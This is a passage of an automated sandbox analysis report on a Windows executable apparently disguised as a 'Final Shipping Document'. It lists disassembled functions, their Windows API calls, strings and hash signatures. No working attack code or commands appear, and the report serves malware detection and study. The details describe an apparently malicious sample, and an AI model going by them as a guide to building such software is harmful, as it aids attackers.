                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 636576611-1287834457
                                                            • Opcode ID: 56417462e8bf20dea9c42a0982086e09edca03589b54e2656f7db7e444426a52
                                                            • Instruction ID: b4eeceaf1d7bd6579d85cc5f923f8ac2ab372f432cd680dcc2090afdca353b87
                                                            • Opcode Fuzzy Hash: 56417462e8bf20dea9c42a0982086e09edca03589b54e2656f7db7e444426a52
                                                            • Instruction Fuzzy Hash: 5661D070608361AFD310DF64D888F6EB7E8EF49714F10081AF9959B691C774EE88CB92
                                                            Function 00C13388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C133CF
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C133F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: LoadString$_wcslen
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 4099089115-3080491070
                                                            • Opcode ID: 61aa95ccb2b92f4d6ac7cb587e04580246b10f35c881e766e11b36a00f189374
                                                            • Instruction ID: fa734f54c6a6f440d89afe2d3a662f897c2285270a598ed646b78e15d0336db3
                                                            • Opcode Fuzzy Hash: 61aa95ccb2b92f4d6ac7cb587e04580246b10f35c881e766e11b36a00f189374
                                                            • Instruction Fuzzy Hash: 05518071904209ABDF15EBE0CD82EEEB7B9EF05744F1440A5F505720A2EB356F98EB60
                                                            Function 00C0B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 1256254125-769500911
                                                            • Opcode ID: 726205dacb0cfaf4e4c7ea22065479c7317ef5c43fbf3cb29f9394cc6ae435e9
                                                            • Instruction ID: 4c4633b5693e491ebeae6250010b5ba8571c6f3b62d3f4c17522c494d4d0fcc1
                                                            • Opcode Fuzzy Hash: 726205dacb0cfaf4e4c7ea22065479c7317ef5c43fbf3cb29f9394cc6ae435e9
                                                            • Instruction Fuzzy Hash: 6241A432A001279ACB24DF7DC8905BEB7B5AFA1B54B244229F435DB2C4E732CE81C790
                                                            Function 00C15393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C153A0
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C15416
                                                            • GetLastError.KERNEL32 ref: 00C15420
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 00C154A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: f851b0d210584cb2336e87ace9407193d97a7cf0fa761997607df05348d8b56b
                                                            • Instruction ID: d7dbd440e434990d6d84e4907832d8a9b83b4c0e2a907faf1cf1262b18f7fbff
                                                            • Opcode Fuzzy Hash: f851b0d210584cb2336e87ace9407193d97a7cf0fa761997607df05348d8b56b
                                                            • Instruction Fuzzy Hash: 9A318D75A00604DFCB10DF68C484BEEBBB4EB86305F148065E415DB292DB71DEC6EB90
                                                            Function 00C33C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateMenu.USER32 ref: 00C33C79
                                                            • SetMenu.USER32(?,00000000), ref: 00C33C88
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C33D10
                                                            • IsMenu.USER32(?), ref: 00C33D24
                                                            • CreatePopupMenu.USER32 ref: 00C33D2E
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C33D5B
                                                            • DrawMenuBar.USER32 ref: 00C33D63
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                            • String ID: 0$F
                                                            • API String ID: 161812096-3044882817
                                                            • Opcode ID: 53b4b954e570449e36a7de1965f9b8d93be911f5a891535cb8b7d843c0f5499c
                                                            • Instruction ID: 7a5a8a435446e85c275c25dc7d2436ec980c1c6ef309e2584a4b1db1b0efea26
                                                            • Opcode Fuzzy Hash: 53b4b954e570449e36a7de1965f9b8d93be911f5a891535cb8b7d843c0f5499c
                                                            • Instruction Fuzzy Hash: 44415779A21209AFDB14CF64D888BAE7BB5FF49350F140029FA56A7360D730AA10DF94
                                                            Function 00C33A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C33A9D
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C33AA0
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C33AC7
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C33AEA
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C33B62
                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00C33BAC
                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00C33BC7
                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00C33BE2
                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00C33BF6
                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00C33C13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow
                                                            • String ID:
                                                            • API String ID: 312131281-0
                                                            • Opcode ID: 0ca7c9c4e4904eb8534fb0fc0ab503d31b6529b2e965f9b4eafb2f35c97bfdc5
                                                            • Instruction ID: 7ff0a6847835e24355496c08d36167552d68ba840139c4702cb4886d08a1140f
                                                            • Opcode Fuzzy Hash: 0ca7c9c4e4904eb8534fb0fc0ab503d31b6529b2e965f9b4eafb2f35c97bfdc5
                                                            • Instruction Fuzzy Hash: 00617A75900248AFDB11DFA8CC81FEEB7F8EB09714F144199FA15A72A1C774AE81DB50
                                                            Function 00C0B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00C0B151
                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B165
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00C0B16C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B17B
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C0B18D
                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B1A6
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B1B8
                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B1FD
                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B212
                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B21D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            • Opcode ID: 5f313fcc12dd882cbb45eda731a08a60e92a70f55696d0b4da75d5e2ba6cc197
                                                            • Instruction ID: 347dfba4e476cece57e1e5f35bedfb7d50ee6a6deab1f17a71642c00cbd9d280
                                                            • Opcode Fuzzy Hash: 5f313fcc12dd882cbb45eda731a08a60e92a70f55696d0b4da75d5e2ba6cc197
                                                            • Instruction Fuzzy Hash: 2C31AB71510204BFDB10DF24DC89BAE7BB9BB61711F108409FA29E62D0D7B89E80CF60
                                                            Function 00BD2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00BD2C94
                                                              • Part of subcall function 00BD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000), ref: 00BD29DE
                                                              • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                            • _free.LIBCMT ref: 00BD2CA0
                                                            • _free.LIBCMT ref: 00BD2CAB
                                                            • _free.LIBCMT ref: 00BD2CB6
                                                            • _free.LIBCMT ref: 00BD2CC1
                                                            • _free.LIBCMT ref: 00BD2CCC
                                                            • _free.LIBCMT ref: 00BD2CD7
                                                            • _free.LIBCMT ref: 00BD2CE2
                                                            • _free.LIBCMT ref: 00BD2CED
                                                            • _free.LIBCMT ref: 00BD2CFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 982dd32ede494c69e789583d43bdbfbe99cf7690923fca4ca8b089e5c0576dd7
                                                            • Instruction ID: fb7a87aa778442165bf61b72f21b847dcd549a0afc34707516f07539d131cc4d
                                                            • Opcode Fuzzy Hash: 982dd32ede494c69e789583d43bdbfbe99cf7690923fca4ca8b089e5c0576dd7
                                                            • Instruction Fuzzy Hash: B411A47A100148AFCB02EF54D892CDDBBA5FF15350F4144A6FA489F322EA35EE50AB90
                                                            Function 00BA1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BA1459
                                                            • OleUninitialize.OLE32(?,00000000), ref: 00BA14F8
                                                            • UnregisterHotKey.USER32(?), ref: 00BA16DD
                                                            • DestroyWindow.USER32(?), ref: 00BE24B9
                                                            • FreeLibrary.KERNEL32(?), ref: 00BE251E
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BE254B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 469580280-3243417748
                                                            • Opcode ID: 5e02c1d4ce2d21ab3039c960f2ebdc5954c7237c8d0d73dfa662b549494e4603
                                                            • Instruction ID: 72e37986d66f2f7beafa3f3cdf0458d02782c1b2ba25820020cce362db8d3ac6
                                                            • Opcode Fuzzy Hash: 5e02c1d4ce2d21ab3039c960f2ebdc5954c7237c8d0d73dfa662b549494e4603
                                                            • Instruction Fuzzy Hash: F8D147717052528FCB19EF19C999A69F7E4BF06700F1546EDE44AAB252CB30AD12CF50
                                                            Function 00C17DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C17FAD
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C17FC1
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C17FEB
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C18005
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18017
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18060
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C180B0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile
                                                            • String ID: *.*
                                                            • API String ID: 769691225-438819550
                                                            • Opcode ID: e1655895979c167bc7b971ce9d8c2a878a6acb725f6ae6ae466e1c758de1af42
                                                            • Instruction ID: 8f45ecc1b298dd8faa8edccc296a40e487c259da1927fd1e6b0f1cbe4a110947
                                                            • Opcode Fuzzy Hash: e1655895979c167bc7b971ce9d8c2a878a6acb725f6ae6ae466e1c758de1af42
                                                            • Instruction Fuzzy Hash: 4381A1725082059FCB20EF15C844AEEB7E8BF8A310F14499EF895D7250DB35DE89DB92
                                                            Function 00BA5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00BA5C7A
                                                              • Part of subcall function 00BA5D0A: GetClientRect.USER32(?,?), ref: 00BA5D30
                                                              • Part of subcall function 00BA5D0A: GetWindowRect.USER32(?,?), ref: 00BA5D71
                                                              • Part of subcall function 00BA5D0A: ScreenToClient.USER32(?,?), ref: 00BA5D99
                                                            • GetDC.USER32 ref: 00BE46F5
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BE4708
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00BE4716
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00BE472B
                                                            • ReleaseDC.USER32(?,00000000), ref: 00BE4733
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BE47C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            • Opcode ID: 64acd5e2da4083ffe0021c1bf883849b483acebacf5ed3077e1258ccff667d29
                                                            • Instruction ID: 8452f54488eec2a4442c97241c8e8175c56bf108d01ea65fc0ce1faacf5afcf8
                                                            • Opcode Fuzzy Hash: 64acd5e2da4083ffe0021c1bf883849b483acebacf5ed3077e1258ccff667d29
                                                            • Instruction Fuzzy Hash: 9271FD30404245EFCF218F65C984AAE7BF5FF4A320F1842E9ED565A2AAC7319D81DF90
                                                            Function 00C1359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00C135E4
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • LoadStringW.USER32(00C72390,?,00000FFF,?), ref: 00C1360A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: LoadString$_wcslen
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 4099089115-2391861430
                                                            • Opcode ID: edd39ef11c7e80d9e3984bef36e88a24573a22e40a5cf295791e4689c00cfa33
                                                            • Instruction ID: 37781cfc86b801d781115f02b5d366ceb4c6ead135f02b8a91cce6c8d44f7a23
                                                            • Opcode Fuzzy Hash: edd39ef11c7e80d9e3984bef36e88a24573a22e40a5cf295791e4689c00cfa33
                                                            • Instruction Fuzzy Hash: 80518F71804249ABDF14EBA0CC82EEEBBB4EF05344F084165F515721A2EB301BD9EFA0
                                                            Function 00C38B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                              • Part of subcall function 00BB912D: GetCursorPos.USER32(?), ref: 00BB9141
                                                              • Part of subcall function 00BB912D: ScreenToClient.USER32(00000000,?), ref: 00BB915E
                                                              • Part of subcall function 00BB912D: GetAsyncKeyState.USER32(00000001), ref: 00BB9183
                                                              • Part of subcall function 00BB912D: GetAsyncKeyState.USER32(00000002), ref: 00BB919D
                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00C38B6B
                                                            • ImageList_EndDrag.COMCTL32 ref: 00C38B71
                                                            • ReleaseCapture.USER32 ref: 00C38B77
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00C38C12
                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C38C25
                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00C38CFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                            • API String ID: 1924731296-2107944366
                                                            • Opcode ID: a2347fb42a8c88022e72bbcba38c8af231e74de3af3b9bb477bb33af0172c3b5
                                                            • Instruction ID: 4a09a0bbef16721c231b1223e4610f9e0500be8558a0a9da1ead2df16e67a8d3
                                                            • Opcode Fuzzy Hash: a2347fb42a8c88022e72bbcba38c8af231e74de3af3b9bb477bb33af0172c3b5
                                                            • Instruction Fuzzy Hash: 89518A71118300AFD714DF24DC96FAE77E4FB88754F000669F996A72E1DB70AA48CB62
                                                            Function 00C1C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C1C272
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C1C29A
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C1C2CA
                                                            • GetLastError.KERNEL32 ref: 00C1C322
                                                            • SetEvent.KERNEL32(?), ref: 00C1C336
                                                            • InternetCloseHandle.WININET(00000000), ref: 00C1C341
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: d99c11a14377d03f8b51ed6d09c8955a9d96fba440a1545c9c527939d2734898
                                                            • Instruction ID: 43c373ca05f8a833bd47568cf31d34750a4522ad20b8cc30b9639c473c7b76f7
